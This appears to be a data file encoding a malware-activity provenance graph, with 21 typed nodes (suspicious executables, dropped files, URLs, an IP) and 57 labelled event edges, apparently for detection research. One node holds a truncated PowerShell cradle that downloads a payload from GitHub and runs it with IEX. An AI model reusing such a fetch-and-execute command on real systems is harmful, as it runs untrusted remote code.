21
MP*-vbs.exe
MF-igfxsrvc.dll
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
SF-C:\Windows\system32\msiexec
MP*-InstaBotPro (1).exe 
MF-\Users\admin\AppData\Local\Temp\GLJC215.tmp
MF-C:\Users\admin\AppData\Roaming\JavaNetworkServices86\dKEseX3QhmleytdFWRInDTBBZv.bat
MF-msetup\akrienbeta.rar
TP-fltmc.exe
MF-C:\Windows\system32\prevhost.exe
MP*-conhost.exe
TP-explorer.exe
TP*-de6a9b27-2bca-4abb-8a20-2deeaa715179.exe
MP-kkkkk.exe 
SO-45.63.100.72
TP-Proforma Invoice and Bank swift-REG.PI-0086547654.exe 
SF-C:\Program Files\Hantek2xx2\STDFU
MP-p2602380.exe
MF-C:\Users\admin\AppData\Local\Temp\P
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
TP-ma grosse bite.exe 
57
0 1 RD-1
2 0 RF-1
0 3 WR-1
0 4 FR-1
4 1 WR-2
2 4 RF-2
4 3 WR-2
0 5 WR-1
4 5 WR-2
0 6 CD-1
4 6 EX-2
0 7 WR-1
4 7 EX-2
0 8 FR-1
8 1 EX-2
2 8 RF-2
8 3 CD-2
4 8 UK-2
0 9 WR-1
0 10 FR-1
10 1 RD-3
2 10 RF-3
10 3 RD-3
10 5 WR-3
10 6 RD-3
10 7 WR-3
10 9 WR-3
11 1 UK-3
2 12 RF-4
12 3 RD-4
12 5 WR-4
12 6 RD-4
12 7 WR-4
12 9 RD-4
10 12 IJ-3
13 3 UK-4
14 10 RF-3
12 14 ST-4
15 5 WR-4
15 6 RD-4
15 7 WR-4
15 9 RD-4
10 15 IJ-3
12 15 UK-4
10 16 EX-3
17 7 RD-4
17 9 RD-4
17 14 ST-4
17 16 WR-4
10 18 WR-3
17 18 WR-4
19 10 RF-3
17 19 ST-4
10 20 IJ-3
14 20 RF-4
20 16 WR-4
17 20 UK-4

